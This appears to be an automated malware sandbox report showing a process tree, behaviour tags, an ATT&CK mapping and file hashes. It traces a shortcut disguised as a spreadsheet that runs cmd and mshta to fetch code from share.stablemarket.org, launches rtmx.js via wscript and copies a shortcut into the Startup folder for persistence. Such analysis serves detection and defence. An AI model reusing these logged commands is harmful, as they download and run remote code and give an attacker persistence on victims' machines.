PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe
PID 3420 wrote to memory of 2992	3420	MicrosoftEdgeCP.exe	MicrosoftEdgeCP.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:2740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.stablemarket.org/AUeSdfDyTf7kMvSGKlVh8K9Z1FjBuP9bJrv/Zqtwi+g=
2⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta https://share.stablemarket.org/AUeSdfDyTf7kMvSGKlVh8K9Z1FjBuP9bJrv/Zqtwi+g=
3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\explorer.exe
"C:\Windows\explorer.exe" "https://docs.google.com/spreadsheets/d/1CTWarBPpx6kQjpevxr7qeQGPenjAR_7H/edit?usp=sharing&ouid=118006626630144401406&rtpof=true&sd=true"
4⤵
PID:804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\Admin\AppData\Local\Temp\rtmx.js" share.stablemarket.org/ 1 & start /b wscript "C:\Users\Admin\AppData\Local\Temp\rtmx.js" share.stablemarket.org/ 2 & move "C:\Users\Admin\AppData\Local\Temp\UserAssist.lnk" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
4⤵
- Suspicious use of WriteProcessMemory
PID:1120

C:\Windows\system32\wscript.exe
wscript "C:\Users\Admin\AppData\Local\Temp\rtmx.js" share.stablemarket.org/ 1
5⤵
- Blocklisted process makes network request
PID:1480

C:\Windows\system32\wscript.exe
wscript "C:\Users\Admin\AppData\Local\Temp\rtmx.js" share.stablemarket.org/ 2
5⤵
- Blocklisted process makes network request
PID:1432

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3992 -s 2352
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:2164

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1620

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:2308

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2992

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4136

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4584

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4676

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\UserAssist.lnk
MD5
489cbc313c1936b45c1b84db43dce223

SHA1
cd6e4d101311a2e675381bfd759645f05f79522e

SHA256
1190e5044da3eee39211ec6584b6df9de5c890a2bc6cb0ec22a50dcb2ef35ffd

SHA512
e2fe617aff44e03529cf7e13f50803fdda75de2abab68293c437254b696813d5fbe661a8eac6ceb58908c20bc22554c3acd9fed764370cda764296af15fbb7f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\rtmx.js
MD5
0465f48d3e05ab31c5225b0c5e3e2368

SHA1
71a9bac9a13f9ea82d525bcf8285d1179a0f53e7

SHA256
0b9c8953230ebdfbbf68432cee750737b520224116fd1bca806005d135ec8c26

SHA512
2b510a88bbf3cd4a58a8d3e7136050848492cec9e8eb9fa58b3d53c4a34221f6c1c5ab0ace7a5734ffecc55c357273e64f4872cb51c7a098a883530b2b190204

Download Submit
memory/804-119-0x0000000000000000-mapping.dmp

Download
memory/1120-120-0x0000000000000000-mapping.dmp

Download
memory/1432-122-0x0000000000000000-mapping.dmp

Download
memory/1480-121-0x0000000000000000-mapping.dmp

Download
memory/3004-116-0x0000000000000000-mapping.dmp

Download
memory/3992-117-0x0000000000000000-mapping.dmp

Download
memory/3992-118-0x00000237EE4C8000-0x00000237EE4D0000-memory.dmp

Filesize
32KB

Download